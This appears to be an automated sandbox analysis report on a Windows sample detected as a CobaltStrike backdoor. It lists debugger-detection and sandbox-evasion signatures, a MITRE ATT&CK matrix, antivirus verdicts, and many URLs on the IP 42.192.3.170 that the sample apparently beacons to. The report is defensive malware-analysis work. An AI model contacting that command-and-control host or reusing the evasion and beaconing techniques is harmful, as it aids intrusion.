          Source: C:\Users\user\Desktop\yZah650lHL.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\yZah650lHL.exeCode function: 0_2_00679220 malloc,_snprintf,FindFirstFileA,free,malloc,_snprintf,free,FindNextFileA,FindClose,0_2_00679220
          Source: C:\Users\user\Desktop\yZah650lHL.exeCode function: 0_2_00671C30 malloc,GetCurrentDirectoryA,FindFirstFileA,GetLastError,free,free,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,FindNextFileA,FindClose,0_2_00671C30
          Source: C:\Users\user\Desktop\yZah650lHL.exeThread delayed: delay time: 60000Jump to behavior
          Source: yZah650lHL.exe, 00000000.00000002.4113948673.000000000072C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP
          Source: yZah650lHL.exe, 00000000.00000003.2495218353.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1794858931.00000000007A4000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1701127794.00000000007A4000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3132490030.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2894333153.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2991067107.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3153029603.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3230732408.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2058516201.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1833140750.00000000007A4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: C:\Users\user\Desktop\yZah650lHL.exeAPI call chain: ExitProcess graph end nodegraph_0-37629

          Anti Debugging

          barindex
          Found API chain indicative of debugger detection
          Source: C:\Users\user\Desktop\yZah650lHL.exeDebugger detection routine: QueryPerformanceCounter, DebugActiveProcess, DecisionNodes, ExitProcess or Sleepgraph_0-37297
          Found potential dummy code loops (likely to delay analysis)
          Source: C:\Users\user\Desktop\yZah650lHL.exeProcess Stats: CPU usage > 42% for more than 60s
          Source: C:\Users\user\Desktop\yZah650lHL.exeCode function: 0_2_0068F810 MultiByteToWideChar,MultiByteToWideChar,DebuggerProbe,DebuggerRuntime,IsDebuggerPresent,_RTC_GetSrcLine,WideCharToMultiByte,WideCharToMultiByte,0_2_0068F810
          Source: C:\Users\user\Desktop\yZah650lHL.exeCode function: 0_2_00689744 EncodePointer,__crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00689744
          Source: C:\Users\user\Desktop\yZah650lHL.exeCode function: 0_2_0066D83C GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_0066D83C
          Source: C:\Users\user\Desktop\yZah650lHL.exeCode function: 0_2_0068C0C8 _lseeki64_nolock,_lseeki64_nolock,GetProcessHeap,HeapAlloc,_errno,_errno,_setmode_nolock,__doserrno,_errno,_setmode_nolock,GetProcessHeap,HeapFree,_lseeki64_nolock,SetEndOfFile,_errno,__doserrno,GetLastError,_lseeki64_nolock,0_2_0068C0C8
          Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
          Source: C:\Users\user\Desktop\yZah650lHL.exeCode function: 0_2_00401180 Sleep,Sleep,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_initterm,GetStartupInfoA,0_2_00401180
          Source: C:\Users\user\Desktop\yZah650lHL.exeCode function: 0_2_00401A70 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,0_2_00401A70
          Source: C:\Users\user\Desktop\yZah650lHL.exeCode function: 0_2_004542E4 SetUnhandledExceptionFilter,0_2_004542E4
          Source: C:\Users\user\Desktop\yZah650lHL.exeCode function: 0_2_00402F62 SetUnhandledExceptionFilter,0_2_00402F62
          Source: C:\Users\user\Desktop\yZah650lHL.exeCode function: 0_2_006924F0 SetUnhandledExceptionFilter,0_2_006924F0
          Source: C:\Users\user\Desktop\yZah650lHL.exeCode function: 0_2_006844D0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,UnhandledExceptionFilter,0_2_006844D0

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Yara detected Powershell download and execute
          Source: Yara matchFile source: Process Memory Space: yZah650lHL.exe PID: 6572, type: MEMORYSTR
          Source: C:\Users\user\Desktop\yZah650lHL.exeCode function: 0_2_0067DF50 LogonUserA,GetLastError,ImpersonateLoggedOnUser,GetLastError,0_2_0067DF50
          Source: C:\Users\user\Desktop\yZah650lHL.exeCode function: 0_2_00692050 AllocateAndInitializeSid,0_2_00692050
          Source: C:\Users\user\Desktop\yZah650lHL.exeCode function: 0_2_00401630 CreateNamedPipeA,ConnectNamedPipe,WriteFile,CloseHandle,0_2_00401630
          Source: C:\Users\user\Desktop\yZah650lHL.exeCode function: 0_2_00401990 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_00401990
          Source: C:\Users\user\Desktop\yZah650lHL.exeCode function: 0_2_00675E28 GetUserNameA,GetComputerNameA,GetModuleFileNameA,strrchr,GetVersionExA,GetProcAddress,GetModuleHandleA,GetProcAddress,_snprintf,0_2_00675E28
          Source: C:\Users\user\Desktop\yZah650lHL.exeCode function: 0_2_00675E28 GetUserNameA,GetComputerNameA,GetModuleFileNameA,strrchr,GetVersionExA,GetProcAddress,GetModuleHandleA,GetProcAddress,_snprintf,0_2_00675E28
          Source: C:\Users\user\Desktop\yZah650lHL.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Remote Access Functionality

          barindex
          Yara detected CobaltStrike
          Source: Yara matchFile source: Process Memory Space: yZah650lHL.exe PID: 6572, type: MEMORYSTR
          Source: Yara matchFile source: 0.2.yZah650lHL.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.yZah650lHL.exe.1a0000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.yZah650lHL.exe.660000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.yZah650lHL.exe.660000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Users\user\Desktop\yZah650lHL.exeCode function: 0_2_00676A78 socket,htons,ioctlsocket,closesocket,bind,listen,0_2_00676A78
          Source: C:\Users\user\Desktop\yZah650lHL.exeCode function: 0_2_00676670 htonl,htons,socket,closesocket,bind,ioctlsocket,0_2_00676670
          Source: C:\Users\user\Desktop\yZah650lHL.exeCode function: 0_2_00692630 bind,0_2_00692630
          Source: C:\Users\user\Desktop\yZah650lHL.exeCode function: 0_2_0067EE8C socket,closesocket,htons,bind,listen,0_2_0067EE8C

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire Infrastructure2
          Valid Accounts          		2
          Native API          		2
          Valid Accounts          		2
          Valid Accounts          		2
          Valid Accounts          		OS Credential Dumping1
          System Time Discovery          		Remote Services1
          Archive Collected Data          		21
          Encrypted Channel          		Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault AccountsScheduled Task/Job1
          DLL Side-Loading          		21
          Access Token Manipulation          		1
          Modify Registry          		LSASS Memory1
          Query Registry          		Remote Desktop ProtocolData from Removable Media2
          Ingress Tool Transfer          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
          Process Injection          		212
          Virtualization/Sandbox Evasion          		Security Account Manager341
          Security Software Discovery          		SMB/Windows Admin SharesData from Network Shared Drive1
          Non-Application Layer Protocol          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
          DLL Side-Loading          		21
          Access Token Manipulation          		NTDS212
          Virtualization/Sandbox Evasion          		Distributed Component Object ModelInput Capture112
          Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
          Process Injection          		LSA Secrets1
          Process Discovery          		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
          Obfuscated Files or Information          		Cached Domain Credentials1
          Application Window Discovery          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
          Install Root Certificate          		DCSync1
          Account Discovery          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
          Software Packing          		Proc Filesystem1
          System Owner/User Discovery          		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
          DLL Side-Loading          		/etc/passwd and /etc/shadow1
          File and Directory Discovery          		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
          IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing4
          System Information Discovery          		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          yZah650lHL.exe81%VirustotalBrowse
          yZah650lHL.exe87%ReversingLabsWin64.Backdoor.CobaltStrike
          yZah650lHL.exe100%AviraHEUR/AGEN.1344321
          yZah650lHL.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          https://42.192.3.170/b-53011b87bd060%Avira URL Cloudsafe
          https://42.192.3.170/dpixelhK0%Avira URL Cloudsafe
          https://42.192.3.170/ptography0%Avira URL Cloudsafe
          https://42.192.3.170/vide0%Avira URL Cloudsafe
          https://42.192.3.170/dpixelGX0%Avira URL Cloudsafe
          https://42.192.3.170/dpixel0%Avira URL Cloudsafe
          https://42.192.3.170/dpixelcs0%Avira URL Cloudsafe
          https://42.192.3.170/dpixelBX0%Avira URL Cloudsafe
          https://42.192.3.170/)0%Avira URL Cloudsafe
          https://42.192.3.170/dpixelz0%Avira URL Cloudsafe
          https://42.192.3.170/dpixely0%Avira URL Cloudsafe
          https://42.192.3.170/dpixelphy0%Avira URL Cloudsafe
          https://42.192.3.170/dpixelxJ0%Avira URL Cloudsafe
          https://42.192.3.170/pixelq0%Avira URL Cloudsafe
          https://42.192.3.170/%0%Avira URL Cloudsafe
          https://42.192.3.170/dpixel3$0%Avira URL Cloudsafe
          https://42.192.3.170/00%Avira URL Cloudsafe
          https://42.192.3.170/pixelLMEM8x0%Avira URL Cloudsafe
          https://42.192.3.170/dpixel)X0%Avira URL Cloudsafe
          https://42.192.3.170/90%Avira URL Cloudsafe
          42.192.3.1700%Avira URL Cloudsafe
          https://42.192.3.170/dpixelm0%Avira URL Cloudsafe
          https://42.192.3.170/S:0%Avira URL Cloudsafe
          http://127.0.0.1:%u/0%Avira URL Cloudsafe
          https://42.192.3.170/dpixelp0%Avira URL Cloudsafe
          https://42.192.3.170/A0%Avira URL Cloudsafe
          https://42.192.3.170/dpixelq0%Avira URL Cloudsafe
          https://42.192.3.170/dpixel1b87bd0630%Avira URL Cloudsafe
          https://42.192.3.170/dpixelt0%Avira URL Cloudsafe
          https://42.192.3.170/dpixel8s0%Avira URL Cloudsafe
          https://42.192.3.170/dpixel1b87bd060%Avira URL Cloudsafe
          https://42.192.3.170/F0%Avira URL Cloudsafe
          https://42.192.3.170/dpixel$X0%Avira URL Cloudsafe
          https://42.192.3.170/Q0%Avira URL Cloudsafe
          https://42.192.3.170/M0%Avira URL Cloudsafe
          https://42.192.3.170/nd-point:0%Avira URL Cloudsafe
          https://42.192.3.170/dpixela0%Avira URL Cloudsafe
          https://42.192.3.170/pixelM0%Avira URL Cloudsafe
          https://42.192.3.170/dpixelXu0%Avira URL Cloudsafe
          https://42.192.3.170/dpixeltem320%Avira URL Cloudsafe
          https://42.192.3.170/dpixelS0%Avira URL Cloudsafe
          https://42.192.3.170/xel0%Avira URL Cloudsafe
          https://42.192.3.170/dpixel70%Avira URL Cloudsafe
          https://42.192.3.170/pixel1b87bd060%Avira URL Cloudsafe
          https://42.192.3.170/dpixel#X0%Avira URL Cloudsafe
          https://42.192.3.170/dpixel90%Avira URL Cloudsafe
          https://42.192.3.170/pixel0%Avira URL Cloudsafe
          https://42.192.3.170/0%Avira URL Cloudsafe
          https://42.192.3.170/pixel90%Avira URL Cloudsafe
          https://42.192.3.170/dpixelHP0%Avira URL Cloudsafe
          https://42.192.3.170/pixel(0%Avira URL Cloudsafe
          https://42.192.3.170/y0%Avira URL Cloudsafe
          https://42.192.3.170/dpixel=#0%Avira URL Cloudsafe
          https://42.192.3.170/dpixeltz0%Avira URL Cloudsafe
          https://42.192.3.170/dpixelHG0%Avira URL Cloudsafe
          https://42.192.3.170/dpixel00%Avira URL Cloudsafe
          https://42.192.3.170/pixel00%Avira URL Cloudsafe
          https://42.192.3.170/dpixel)0%Avira URL Cloudsafe
          https://42.192.3.170/dpixel;X0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          No contacted domains info

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          https://42.192.3.170/dpixeltrue
          • Avira URL Cloud: safe
          		unknown
          42.192.3.170true
          • Avira URL Cloud: safe
          		unknown

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          https://42.192.3.170/b-53011b87bd06yZah650lHL.exe, 00000000.00000003.2402005752.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3230732408.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3369785762.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3191073968.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3250525186.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3211424591.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3094866758.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3271622558.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3113705174.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2458872458.00000000007EE000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://42.192.3.170/dpixelGXyZah650lHL.exe, 00000000.00000003.2288370778.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1944793809.00000000007A4000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://42.192.3.170/dpixelcsyZah650lHL.exe, 00000000.00000003.3467626542.0000000000793000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://42.192.3.170/videyZah650lHL.exe, 00000000.00000003.2270174330.00000000007B9000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2251319946.0000000000793000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://42.192.3.170/dpixelhKyZah650lHL.exe, 00000000.00000003.3011079051.0000000000793000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://42.192.3.170/ptographyyZah650lHL.exe, 00000000.00000003.1739905253.00000000007C1000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1739847137.00000000007B9000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1719801648.00000000007B9000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000002.4114142159.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1907581606.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3487466252.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1719918734.00000000007C1000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1758268591.00000000007B9000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1926725987.00000000007EE000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://42.192.3.170/)yZah650lHL.exe, 00000000.00000003.3407302077.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3448145276.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3427840081.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3369785762.0000000000793000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://42.192.3.170/dpixelBXyZah650lHL.exe, 00000000.00000003.2420730874.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1982892951.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2176453491.0000000000793000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://42.192.3.170/dpixelzyZah650lHL.exe, 00000000.00000003.3427840081.0000000000793000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://42.192.3.170/dpixelphyyZah650lHL.exe, 00000000.00000003.3230732408.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2325663976.00000000007EE000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://42.192.3.170/dpixelyyZah650lHL.exe, 00000000.00000003.2251319946.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2288485933.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2345864498.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2402005752.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2420730874.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2306808221.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2440141638.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1832985511.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2325663976.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2364539586.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2476981159.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2458872458.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2270174330.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2495218353.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2383203450.00000000007EB000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://42.192.3.170/%yZah650lHL.exe, 00000000.00000003.2553907934.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2630411066.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2970624866.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2572561886.00000000007EE000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://42.192.3.170/dpixelxJyZah650lHL.exe, 00000000.00000003.3347918530.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2991067107.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3171943866.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3407302077.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3448145276.0000000000793000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://42.192.3.170/pixelqyZah650lHL.exe, 00000000.00000003.2058516201.00000000007EE000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://42.192.3.170/dpixel3$yZah650lHL.exe, 00000000.00000002.4113948673.0000000000793000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://42.192.3.170/pixelLMEM8xyZah650lHL.exe, 00000000.00000003.2176453491.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2553907934.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2572561886.00000000007EE000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://42.192.3.170/dpixel)XyZah650lHL.exe, 00000000.00000003.2176453491.0000000000793000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://42.192.3.170/0yZah650lHL.exe, 00000000.00000003.2856843273.00000000007EB000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://42.192.3.170/9yZah650lHL.exe, 00000000.00000003.3230732408.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1944932015.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1926725987.00000000007EE000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://42.192.3.170/S:yZah650lHL.exe, 00000000.00000003.3250525186.0000000000793000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://42.192.3.170/dpixelmyZah650lHL.exe, 00000000.00000003.1870269974.00000000007ED000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3308921920.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3487466252.0000000000793000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://42.192.3.170/dpixelpyZah650lHL.exe, 00000000.00000003.2913198165.00000000007BA000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3230732408.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3427840081.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3211424591.0000000000793000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://127.0.0.1:%u/yZah650lHL.exe, 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://42.192.3.170/AyZah650lHL.exe, 00000000.00000003.1851666148.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1832985511.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1813737040.00000000007EB000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://42.192.3.170/dpixel1b87bd063yZah650lHL.exe, 00000000.00000003.3328362680.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3132490030.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3347918530.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3031504097.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3071146501.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3369785762.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3407302077.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3448145276.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3308921920.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3051164954.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3427840081.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2176453491.00000000007EE000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://42.192.3.170/dpixelqyZah650lHL.exe, 00000000.00000003.2251319946.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2288485933.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2232239149.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1963443471.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2553907934.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2270174330.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2383203450.00000000007EB000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://42.192.3.170/dpixeltyZah650lHL.exe, 00000000.00000003.1870269974.00000000007ED000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1832985511.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3113705174.0000000000793000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://42.192.3.170/dpixel8syZah650lHL.exe, 00000000.00000003.2251319946.0000000000793000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://42.192.3.170/dpixel1b87bd06yZah650lHL.exe, 00000000.00000003.2402005752.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2991067107.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2420730874.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2440141638.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1963443471.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3487466252.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2970624866.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2950128022.0000000000793000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
